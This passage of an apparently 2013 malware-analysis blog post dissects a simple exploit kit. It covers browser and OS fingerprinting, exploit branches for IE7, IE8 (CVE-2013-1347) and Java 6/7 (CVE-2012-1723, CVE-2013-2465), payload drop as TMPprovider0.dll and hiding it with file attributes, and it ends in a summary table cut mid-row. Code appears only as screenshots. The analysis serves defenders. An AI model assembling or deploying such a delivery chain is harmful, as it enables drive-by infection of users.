<li>Internet browser version</li>
<li>Operating System version</li>
<li>Operating System type (32/64 bit)</li>
</ul>
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip6AHU03CkRFfLxfizW_lrDveHrfRqygt7e7v2-yqO-PqFOwoxzKFrGt8kJyX_xpd5dGBI1oTBY1YayG_iR8oY2A4fDTpCNcHjRljoy7lBRNC88wFW9GS30kJps3rTebpFtjulUHMAB3wl/s1600/Unknown-2013-09-27_variables.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip6AHU03CkRFfLxfizW_lrDveHrfRqygt7e7v2-yqO-PqFOwoxzKFrGt8kJyX_xpd5dGBI1oTBY1YayG_iR8oY2A4fDTpCNcHjRljoy7lBRNC88wFW9GS30kJps3rTebpFtjulUHMAB3wl/s1600/Unknown-2013-09-27_variables.png" width="320" /></a></div>
<i><span style="font-size: x-small;">variables that hold gathered values</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTJn_k368PV4UqprjjrkOeCrwD3OOIKkptuKr_Iv5JvfJrage6OOvtToJKqFD7COw6CX0d_KEJw_GW5hX1EvDQgJR87zCn6rH-aXqQiSZW4V_MOGy1HdDk2EQZl7N3YXubXfUKL1pDVU_h/s1600/Unknown-2013-09-27_browser_type_check.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="54" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTJn_k368PV4UqprjjrkOeCrwD3OOIKkptuKr_Iv5JvfJrage6OOvtToJKqFD7COw6CX0d_KEJw_GW5hX1EvDQgJR87zCn6rH-aXqQiSZW4V_MOGy1HdDk2EQZl7N3YXubXfUKL1pDVU_h/s1600/Unknown-2013-09-27_browser_type_check.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">browser type check - '<span style="color: #3d85c6;">BkEvhdwRlG</span>' holds the UA string</span></i></div>
<br />
The function (screenshot above) returns one of the following values - '<span style="color: #3d85c6;">msie</span>', '<span style="color: #3d85c6;">opera</span>' or '<span style="color: #3d85c6;">firefox</span>'. It's worth noting that the '<span style="color: #3d85c6;">opera</span>' value is not used in any condition or anywhere else in the code. Code leftovers? Future plans?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9IH2yMR4XhJDlI5Ui-ari-NZcQOOD881vraFZCl3LAWjXB20bxGwwnJttRCVgu-hV52fvctghyphenhyphen16AvlAYKYZB9G2IY9ZDqgXKP1cdjM34vAdRqN7lrCN9L4pPJeSTPtyJSaLN72MRLQi7/s1600/Unknown-2013-09-27_browser_version_check.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="119" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9IH2yMR4XhJDlI5Ui-ari-NZcQOOD881vraFZCl3LAWjXB20bxGwwnJttRCVgu-hV52fvctghyphenhyphen16AvlAYKYZB9G2IY9ZDqgXKP1cdjM34vAdRqN7lrCN9L4pPJeSTPtyJSaLN72MRLQi7/s1600/Unknown-2013-09-27_browser_version_check.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">browser version check</span></i></div>
<br />
Another unused code branch here. Even though the Firefox browser version is identified, the value is not used anywhere else in the code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihqtHCU8Wip5BJJZRJKvcK4812kmY02iTRxwUpN6XEIg1o-p24JpE7QDkEV65Gp0cmANqXDxK9EeaWP4z5OAjsNo7RjvGXzeITs6hUfr02Jn6MnzMSG1WJh-8aRHFtnEHB3jSBok2jzoOc/s1600/Unknown-2013-09-27_os_version_check.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="46" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihqtHCU8Wip5BJJZRJKvcK4812kmY02iTRxwUpN6XEIg1o-p24JpE7QDkEV65Gp0cmANqXDxK9EeaWP4z5OAjsNo7RjvGXzeITs6hUfr02Jn6MnzMSG1WJh-8aRHFtnEHB3jSBok2jzoOc/s1600/Unknown-2013-09-27_os_version_check.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">OS version check</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW86vsZuq1p9FYllQxuceSHoMB1ICXNX5tyuV103GLpojGh4QgfatScNTmf4av_U51ej3yvpN9ww3TpypyA4tr0JVdru7zCXuZ_CnT0uCSQxybQR3kL8xGJ5hqFeTbipsmmbycgAfrrWNk/s1600/Unknown-2013-09-27_os_type_check.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="79" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW86vsZuq1p9FYllQxuceSHoMB1ICXNX5tyuV103GLpojGh4QgfatScNTmf4av_U51ej3yvpN9ww3TpypyA4tr0JVdru7zCXuZ_CnT0uCSQxybQR3kL8xGJ5hqFeTbipsmmbycgAfrrWNk/s1600/Unknown-2013-09-27_os_type_check.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">OS type check</span></i></div>
<br />
Yet again, the OS type is identified, but the value is not used. It's quite possible that the content of the second landing page is generated on the fly and that parts of the code are selected depending on some conditions. If that's the case, they need to work on the generation logic. Below are other samples of '<span style="color: #3d85c6;">dead</span>' code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG-xeyTNIQM9gk4EwZFViRkBTk4jgmBCzrsxGQwc9-CVSzq9wxUCOmKaLPgYI6apBPFOGEW1-vVgDwVLToglxjHQ7D0JeSl5_FvQa9YzVDogwAjyAEvvnyIyr5DsHNxjF9RRFe_rkgegC8/s1600/Unknown-2013-09-27_adobe_check.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG-xeyTNIQM9gk4EwZFViRkBTk4jgmBCzrsxGQwc9-CVSzq9wxUCOmKaLPgYI6apBPFOGEW1-vVgDwVLToglxjHQ7D0JeSl5_FvQa9YzVDogwAjyAEvvnyIyr5DsHNxjF9RRFe_rkgegC8/s1600/Unknown-2013-09-27_adobe_check.png" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">function to check Adobe Reader plugin version</span></i></div>
<br />
The function above is never called.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAwuiKvPjuDzlCC60IhwdWxrX08ikbVs-VAIy-AejGubqpsnkScT6xJkwCGj-HV9K3z0N8F1hJQfEdEgGxdipzzWyI3JT5WlK8BygQmVOS7-KnrbbV90vJLIHbazHFX049AkG7rw3x3O9M/s1600/Unknown-2013-09-27_adobe_flow_logic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAwuiKvPjuDzlCC60IhwdWxrX08ikbVs-VAIy-AejGubqpsnkScT6xJkwCGj-HV9K3z0N8F1hJQfEdEgGxdipzzWyI3JT5WlK8BygQmVOS7-KnrbbV90vJLIHbazHFX049AkG7rw3x3O9M/s1600/Unknown-2013-09-27_adobe_flow_logic.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">execution control code based on Adobe Reader version detected</span></i></div>
<br />
If the Adobe infection vector were used, the code above would control the execution flow.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiiv4T4_6KdU6bgNlQrYc304G83fZBGP9-L4iFkLAi8CXR7Xr04xNltpDoSZlbCxXZ5zCkgrbA2d6VR1j6dyHsZF2VMUdhIrmVbGeChyphenhyphenJBA2fqhmWFFINifkfFkL7OAlnXF9GDZ_yUNalO/s1600/Unknown-2013-09-27_adobe_exploit_branches.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiiv4T4_6KdU6bgNlQrYc304G83fZBGP9-L4iFkLAi8CXR7Xr04xNltpDoSZlbCxXZ5zCkgrbA2d6VR1j6dyHsZF2VMUdhIrmVbGeChyphenhyphenJBA2fqhmWFFINifkfFkL7OAlnXF9GDZ_yUNalO/s1600/Unknown-2013-09-27_adobe_exploit_branches.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">three possible Adobe exploit branches</span></i></div>
<br />
Currently empty, but if armed the three functions would target Adobe Reader plugin versions '<span style="color: #3d85c6;">9.3.4</span>', '<span style="color: #3d85c6;">9.4.0</span>' and '<span style="color: #3d85c6;">10.1</span>'.<br />
<br />
Once Internet browser and Operating System types and versions are identified, one of the following code branches will be taken.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjZUQZXd3G1FvMnHQSu-Oem7LRpydY3YIWhCoF-Ps5j2VqgJxAxY89LcSr_2HpkADgi6kvgqo9nnoK0an3qB2RZ3Nc44h3koSATZp6faNld_hjim_SbF-H3iIIVvL6qCltiq7ESjaZ6mLR/s1600/Unknown-2013-09-27_IE7_exploit_branch.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="58" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjZUQZXd3G1FvMnHQSu-Oem7LRpydY3YIWhCoF-Ps5j2VqgJxAxY89LcSr_2HpkADgi6kvgqo9nnoK0an3qB2RZ3Nc44h3koSATZp6faNld_hjim_SbF-H3iIIVvL6qCltiq7ESjaZ6mLR/s1600/Unknown-2013-09-27_IE7_exploit_branch.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">IE7 on XP or W2K or W2K3</span></i></div>
<br />
Exploit code for IE7 on XP or W2K or W2K3 will be called following a request for the malicious JAR file. I couldn't identify the IE7 exploit used in this instance and would appreciate the community's help on it. The code is posted on <a href="http://pastebin.com/djKqZi9B" rel="nofollow" target="_blank">pastebin.com</a>. Please contact me on Twitter or email if you have any information.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdYBDWg77wuJR-Qxxc-lGt5SmnuoLT7VnhEULzdO5NgJ0SUBxq6sxKavvgBePi_dX8kjtwuVB3-yMvd84ams8xGul3QOB7gwwbYLyjVdWfPytU46Lec68Jq2OaGTZN5ixvJW2969VKwfvl/s1600/Unknown-2013-09-27_IE8_exploit_branch.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="58" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdYBDWg77wuJR-Qxxc-lGt5SmnuoLT7VnhEULzdO5NgJ0SUBxq6sxKavvgBePi_dX8kjtwuVB3-yMvd84ams8xGul3QOB7gwwbYLyjVdWfPytU46Lec68Jq2OaGTZN5ixvJW2969VKwfvl/s1600/Unknown-2013-09-27_IE8_exploit_branch.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">IE8 on XP or W2K or W2K3</span></i></div>
<br />
<a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347" rel="nofollow" target="_blank">CVE-2013-1347</a> is targeted if IE8 on XP or W2K or W2K3 is detected. The malicious JAR will be requested after the IE8 exploit attempt. The last condition is a '<span style="color: #3d85c6;">safety net</span>' - it targets all other types of Internet browsers with the Java plugin enabled.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEiBrBmCEUKyagZsvSGqFmBhG-HsToaiOilGTipO4tL1iGVdwJ0zNrhnvgfJyZRIu1hegyYPwaWx-JTlfwTqrSna67PyVQzIy6EUPcL9rKVNNHshFfeSK3Exssj7m9qFD-Z_Zm8pRUVrah/s1600/Unknown-2013-09-27_all_other.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEiBrBmCEUKyagZsvSGqFmBhG-HsToaiOilGTipO4tL1iGVdwJ0zNrhnvgfJyZRIu1hegyYPwaWx-JTlfwTqrSna67PyVQzIy6EUPcL9rKVNNHshFfeSK3Exssj7m9qFD-Z_Zm8pRUVrah/s1600/Unknown-2013-09-27_all_other.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">all other browsers + Java</span></i></div>
<br />
The malicious JAR file is selected using the simple logic below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMHKvo8W1CaQGEKRcg6zADBuWi7rv1a-nfDr25wdOK6aubzcFIKX1PEhU2QiMn5K9uU1Zx5I_UBmuVjTe9KIVRsAwm6eqpMGO_rgW_JYYK7jRKskdsuw9A3nwsUR4Q-M0-A6AulRo8q6Qi/s1600/Unknown-2013-09-27_JAR_selection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="84" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMHKvo8W1CaQGEKRcg6zADBuWi7rv1a-nfDr25wdOK6aubzcFIKX1PEhU2QiMn5K9uU1Zx5I_UBmuVjTe9KIVRsAwm6eqpMGO_rgW_JYYK7jRKskdsuw9A3nwsUR4Q-M0-A6AulRo8q6Qi/s1600/Unknown-2013-09-27_JAR_selection.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">JAR selection logic</span></i></div>
<br />
There are 2 JAR files to choose from - one for Java 6 and one for Java 7. Just as simple as that - no patch level checks, no narrowing of the attack surface to increase the success rate and reduce the chance of detection. This logic is probably dictated by the choice of Java vulnerabilities targeted - '<span style="color: #3d85c6;">CVE-2012-1723 (Java 6)</span>' and '<span style="color: #3d85c6;">CVE-2013-2465 (Java 7)</span>'. In both cases the JAR file is fetched through a GET request for an HTML page containing an '<span style="color: #3d85c6;">&lt;applet&gt;</span>' that pulls the JAR file down.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEM2muT2TzFoGMy2iAcYsBfuEcEH457HKBBIE1AyVJ8KECMqXLnB8bjJCg1YKvZvw2US9gh4fN64Ml2sba0w4bHEw8rNWRO17woG-oViISZZgSlrFgg7kSFYrt6e7LGX9D7EuGdYCOL3nE/s1600/Unknown-2013-09-27_JAR_request.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEM2muT2TzFoGMy2iAcYsBfuEcEH457HKBBIE1AyVJ8KECMqXLnB8bjJCg1YKvZvw2US9gh4fN64Ml2sba0w4bHEw8rNWRO17woG-oViISZZgSlrFgg7kSFYrt6e7LGX9D7EuGdYCOL3nE/s1600/Unknown-2013-09-27_JAR_request.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">requesting JAR files through separate HTML pages</span></i></div>
<br />
The content of the HTML pages for both the Java 6 and Java 7 paths is quite simple - a single '<span style="color: #3d85c6;">&lt;applet&gt;</span>' to request a JAR file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipm1hT4FLagK4Jnlxj1z1gCL1m0frNuUAn_Awnq52ZmJTOEfGqQHhKo8lhKLLq7IbEef-AXLePzzmXEkgR8kF69LnualHn6c8QttI6TWmKtdqLSjvQNuEggPMbL2MSfF7CNI9qwH3c9453/s1600/Unknown-2013-09-27_Java6_JAR_request.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="39" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipm1hT4FLagK4Jnlxj1z1gCL1m0frNuUAn_Awnq52ZmJTOEfGqQHhKo8lhKLLq7IbEef-AXLePzzmXEkgR8kF69LnualHn6c8QttI6TWmKtdqLSjvQNuEggPMbL2MSfF7CNI9qwH3c9453/s1600/Unknown-2013-09-27_Java6_JAR_request.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Java 6 JAR request</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdg0WiNxicJyzkF6gHs93X3SsptnIJ4fAeuWkhdhdQ-CLW6qbON418Ua6QM8RU_2DpKj2tZn1z-UeYMORO6miOFA8E5vJKa4OCnPrj2dVrkriIdQGzyNujjzsCbE1mASkeg7fNJBatQq0w/s1600/Unknown-2013-09-27_Java7_JAR_request.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdg0WiNxicJyzkF6gHs93X3SsptnIJ4fAeuWkhdhdQ-CLW6qbON418Ua6QM8RU_2DpKj2tZn1z-UeYMORO6miOFA8E5vJKa4OCnPrj2dVrkriIdQGzyNujjzsCbE1mASkeg7fNJBatQq0w/s1600/Unknown-2013-09-27_Java7_JAR_request.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Java 7 JAR request</span></i></div>
<br />
I can't think of a good enough reason to request the JAR files through an additional HTML page. The author hasn't learnt how to do it using JavaScript yet? That could also explain why no JNLP file is used to launch the Java 7 JAR file - it's probably in the last chapters of the book the author is reading as he/she learns web programming.<br />
<br />
<b><span style="color: #3d85c6;">"The chase is better than the catch!"</span></b><br />
<br />
With the exception of the naming of some .class files, there is no obfuscation applied to the Java source code or bytecode. Most of the methods and variables are meaningfully named. No parameters are passed to the JVM running the JAR file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtoIsz1_bDWZ-wAV-NKar2G4Mb1H7_tl2QMIFP6jHdkm4Lqdj9sLzyEfR9TObhoyEj5EQFnfPqP4mnkiDA9cyUVjlcMmeO7tyz0wUVtT8OKnuGvTWdfXD5NOKAxllaW1SMDXARt5YoQaGt/s1600/Unknown-2013-09-27_CVE-2012-1723.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtoIsz1_bDWZ-wAV-NKar2G4Mb1H7_tl2QMIFP6jHdkm4Lqdj9sLzyEfR9TObhoyEj5EQFnfPqP4mnkiDA9cyUVjlcMmeO7tyz0wUVtT8OKnuGvTWdfXD5NOKAxllaW1SMDXARt5YoQaGt/s1600/Unknown-2013-09-27_CVE-2012-1723.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of exploit code for '<span style="color: #3d85c6;">CVE-2012-1723</span>'</span></i></div>
<br />
The Java 6 JAR file attempts to exploit '<span style="color: #3d85c6;">CVE-2012-1723</span>' and, if successful, proceeds to download the Initial Payload from a hardcoded URL.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSjb_zQRjSY20Hf2qf6yi4McQjKUkDcf4Py1WixBzLltN2JfX-iN57auU4xd2ZfxsJt6UJ7-fxFrRND1oeGDtW0kPtb1BVYm4_nOS5wPQuEi3J_sd0jWHdxvV1af24D4kMYOKhH8XI3vHZ/s1600/Unknown-2013-09-27_Java6_hardcoded_URL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="41" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSjb_zQRjSY20Hf2qf6yi4McQjKUkDcf4Py1WixBzLltN2JfX-iN57auU4xd2ZfxsJt6UJ7-fxFrRND1oeGDtW0kPtb1BVYm4_nOS5wPQuEi3J_sd0jWHdxvV1af24D4kMYOKhH8XI3vHZ/s1600/Unknown-2013-09-27_Java6_hardcoded_URL.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Initial Payload URL + store location + filename</span></i></div>
<br />
The Initial Payload is stored in the Java Temp folder under the hardcoded filename '<span style="color: #3d85c6;">TMPprovider0.dll</span>'. The payload is executed with the following code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJQ5iBFYguiXUewcqfM1-XZxVf4U30aR495G8-S3H_1OwbTTr2Mm6AL-oil8RPBfc8WBQL7xsDHOtUnPlUPC3TONjgrE9QYe41lh5FgjxLheuK7JL2kfyNLYD6nrAsXRyj9U2-MxfWJxb5/s1600/Unknown-2013-09-27_Java6_execution.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJQ5iBFYguiXUewcqfM1-XZxVf4U30aR495G8-S3H_1OwbTTr2Mm6AL-oil8RPBfc8WBQL7xsDHOtUnPlUPC3TONjgrE9QYe41lh5FgjxLheuK7JL2kfyNLYD6nrAsXRyj9U2-MxfWJxb5/s1600/Unknown-2013-09-27_Java6_execution.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Initial Payload execution code</span></i></div>
<br />
That's pretty much all the functionality included in the Java 6 JAR file. The Java 7 JAR is as straight to business as the Java 6 one, with one extra step. Execution starts with a slightly modified '<span style="color: #3d85c6;">CVE-2013-2465</span>' exploit code copied from the '<span style="color: #3d85c6;">packetstormsecurity.com</span>' advisory.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcc5no8gVjEUifyXPc0IZWD4XUjXlGRsKriBSmdsfGpSyYPFp6kx0608dQ4WPEif6SJ-49Ywa8bYlolMQwgqTZGg_ELpicgVx2SJ0sJVNsARz7Vf7vjNeI2ZLbu9bFs7Gs9Wonf5W9V9VI/s1600/Unknown-2013-09-27_CVE-2013-2465.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcc5no8gVjEUifyXPc0IZWD4XUjXlGRsKriBSmdsfGpSyYPFp6kx0608dQ4WPEif6SJ-49Ywa8bYlolMQwgqTZGg_ELpicgVx2SJ0sJVNsARz7Vf7vjNeI2ZLbu9bFs7Gs9Wonf5W9V9VI/s1600/Unknown-2013-09-27_CVE-2013-2465.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of exploit code for '<span style="color: #3d85c6;">CVE-2013-2465</span>'</span></i></div>
<br />
The Initial Payload is downloaded from the same URL and stored in the same location with the same filename as in the Java 6 sample.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKNeizuClMTbBGtXCaUtdQSiJhnhbmdCNgnEVcLiAoKDSmNTj01HEdH3hhGLfBPsm4euwZJuq5ci9GoetNJV3PyCmqIllg4b7LcVsWOq0vJmviwMgkfCDX5wdTogWqcP1jRY-I7ACuSzAh/s1600/Unknown-2013-09-27_Java7_URL_location.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKNeizuClMTbBGtXCaUtdQSiJhnhbmdCNgnEVcLiAoKDSmNTj01HEdH3hhGLfBPsm4euwZJuq5ci9GoetNJV3PyCmqIllg4b7LcVsWOq0vJmviwMgkfCDX5wdTogWqcP1jRY-I7ACuSzAh/s1600/Unknown-2013-09-27_Java7_URL_location.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Initial Payload URL + store location + filename</span></i></div>
<br />
There is one extra step performed for the Initial Payload delivered by Java 7 JAR file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2sggNebTtZJujNHOYg6uv-X3Ui1eiTlXAjP_pVyD5ajoOzK-mcY-flSmFMc0yqc2yb-iDRM5jT94n5P2zDTGGXmvzm6KuwlikoUDNGa1K-AS4LPwCZqek_s3scZ9SlM6lXgjx_KY_8cPS/s1600/Unknown-2013-09-27_Java7_hide_payload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="21" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2sggNebTtZJujNHOYg6uv-X3Ui1eiTlXAjP_pVyD5ajoOzK-mcY-flSmFMc0yqc2yb-iDRM5jT94n5P2zDTGGXmvzm6KuwlikoUDNGa1K-AS4LPwCZqek_s3scZ9SlM6lXgjx_KY_8cPS/s1600/Unknown-2013-09-27_Java7_hide_payload.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">applying file attributes - '<span style="color: #3d85c6;">hidden</span>' and '<span style="color: #3d85c6;">system</span>'</span></i></div>
<br />
The '<span style="color: #3d85c6;">hidden</span>' and '<span style="color: #3d85c6;">system</span>' file attributes are set on the Initial Payload file stored in the Java Temp folder. It's worth mentioning that the Initial Payload is not '<span style="color: #3d85c6;">protected</span>' in any way during transmission.<br />
<br />
<b><span style="color: #3d85c6;">"Summary"</span></b><br />
<br />
Lack of originality, lack of sophistication... A really simple exploit kit. Nothing to highlight here. I wonder about its success rate. Some details below.<br />
<br />
<style type="text/css">.nobrtable br { display: none }</style>
<br />
<div class="nobrtable">
<table align="center" border="2" bordercolor="#FFFFFF" cellpadding="3" cellspacing="3" style="background-color: black; width: 100%;">
<tbody>
<tr>
<td style="background-color: #f79646; color: white;"><b>General Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Name:</td>
<td style="background-color: #b8cce4; color: black;">Unknown</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date captured:</td>
<td style="background-color: #b8cce4; color: black;">2013-09-27</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date analysed:</td>
<td style="background-color: #b8cce4; color: black;">2013-09-28</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Source/Credits:</td>
<td style="background-color: #b8cce4; color: black;">PCAP from <a href="https://twitter.com/Set_Abominae" rel="nofollow" target="_blank">@Set_Abominae</a>. Live Fiddler capture</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Infection vectors detected:</td>
<td style="background-color: #b8cce4; color: black;">Java 6, Java 7, IE7, IE8</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Vulnerabilities targeted:</td>
<td style="background-color: #b8cce4; color: black;"><pre>CVE-2012-1723
CVE-2013-1347
CVE-2013-2465
CVE-???</pre>
</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Landing page</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Transfer mode:</td>
<td style="background-color: #b8cce4; color: black;">encoded / gzip</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">TDS:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JNLP:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JVM parameters:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Java infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Java 1.6.23 / Java 1.7.15</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JAR hidden content:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload encryption/encoding:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">Java Temp folder</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">Hardcoded - 'TMPprovider0.dll'</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Adobe infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
